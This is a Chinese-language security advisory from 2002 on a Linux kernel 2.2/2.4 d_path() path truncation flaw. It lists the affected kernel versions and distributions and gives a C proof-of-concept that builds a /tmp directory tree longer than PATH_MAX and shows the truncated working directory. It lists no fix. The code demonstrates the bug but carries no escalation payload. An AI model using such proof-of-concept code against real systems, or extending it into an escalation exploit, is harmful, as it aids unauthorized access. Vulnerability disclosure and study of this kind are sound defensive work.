|
|
Linux Kernel d_path()路径截断漏洞
发布时间:2002-03-29
更新时间:2002-03-29
严重程度:高
威胁程度:权限提升
错误类型:意外情况处置错误
利用方式:服务器模式
BUGTRAQ ID:4367
受影响系统Linux kernel 2.2
Linux kernel 2.2.1
Linux kernel 2.2.2
Linux kernel 2.2.3
Linux kernel 2.2.4
Linux kernel 2.2.5
Linux kernel 2.2.6
Linux kernel 2.2.7
Linux kernel 2.2.8
Linux kernel 2.2.9
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2.11
Linux kernel 2.2.12
Linux kernel 2.2.13
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.4
Linux kernel 2.2.14
+ Caldera eDesktop 2.4
+ Caldera eServer 2.3.1
+ RedHat Linux 6.2
Linux kernel 2.2.15
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Linux Mandrake 7.1
Linux kernel 2.2.16
+ RedHat Linux 7.0
Linux kernel 2.2.17
+ MandrakeSoft Linux Mandrake 7.2
+ S.u.S.E. Linux 7.0
Linux kernel 2.2.18
+ Wirex Immunix OS 6.2
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 7.0-Beta
Linux kernel 2.2.19
+ EnGarde Secure Linux 1.0.1
+ MandrakeSoft Linux Mandrake 8.0
+ MandrakeSoft Linux Mandrake 8.0 ppc
+ MandrakeSoft Linux Mandrake 8.1
+ MandrakeSoft Single Network Firewall 7.2
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 7.0
Linux kernel 2.2.20
Linux kernel 2.3
Linux kernel 2.3.99
Linux kernel 2.4
Linux kernel 2.4.1
Linux kernel 2.4.2
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1 i386
Linux kernel 2.4.3
+ MandrakeSoft Linux Mandrake 8.0
+ MandrakeSoft Linux Mandrake 8.0 ppc
Linux kernel 2.4.4
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.6
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.8
+ MandrakeSoft Linux Mandrake 8.1
Linux kernel 2.4.9
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 ia64
Linux kernel 2.4.10
+ S.u.S.E. Linux 7.3
Linux kernel 2.4.11
Linux kernel 2.4.12
Linux kernel 2.4.13
Linux kernel 2.4.14
Linux kernel 2.4.15
Linux kernel 2.4.16
Linux kernel 2.4.17
Linux kernel 2.4.18 详细描述
Linux kernel内核的d_path()函数转换目录数据结构(dentry结构)到ASCII路径名字,指定的目录数据结构(dentry结构)路径返回在一段大小为PAGE_SIZE字节的固定缓冲区中。
如果提交的的目录数据结构(dentry结构)路径过长,超过PAGE_SIZE - 1长度,就会返回不正确的值,返回的路径就会导致结构条目被截断,并没有错误报告。
测试代码
/*
* 2.2.x/2.4.x Linux kernel d_path proof-of-concept exploit
*
* Bug found by cliph
*/
#include <unistd.h>
#include <stdio.h>
#include <limits.h>
#include <errno.h>
#include <paths.h>
/*
* Note: on Linux 2.2.x PATH_MAX = PAGE_SIZE - 1 that gives us 1 byte for
* trailing '\0'
*/
#define PATH_COMPONENT "123456789abcdef"
void err(char * msg)
{
if (errno) {
perror(msg);
exit(1);
}
}
int main()
{
char buf[PATH_MAX + 1]; /* think of trailing '\0' */
int len;
errno = 0;
chdir(_PATH_TMP);
err("chdir");
/* show CWD before exploiting the bug */
getcwd(buf, sizeof(buf));
err("getcwd #1");
fprintf(stderr, "CWD=%.40s\n", buf);
/* creating long directory tree - it must exceed PATH_MAX characters */
for (len = 0; len <= PATH_MAX; len += strlen(PATH_COMPONENT) + 1) {
errno = 0;
mkdir(PATH_COMPONENT, 0700);
if (errno != EEXIST)
err("mkdir");
errno = 0;
chdir(PATH_COMPONENT);
err("mkdir");
}
/* show CWD before exploiting the bug */
getcwd(buf, sizeof(buf));
err("getcwd #1");
fprintf(stderr, "CWD=%.40s... [stripped]\n", buf);
return 0;
}
解决方案
尚无
相关信息
Wojciech Purczynski <cliph@isec.pl>.
参考:http://online.securityfocus.com/archive/1/264117
|
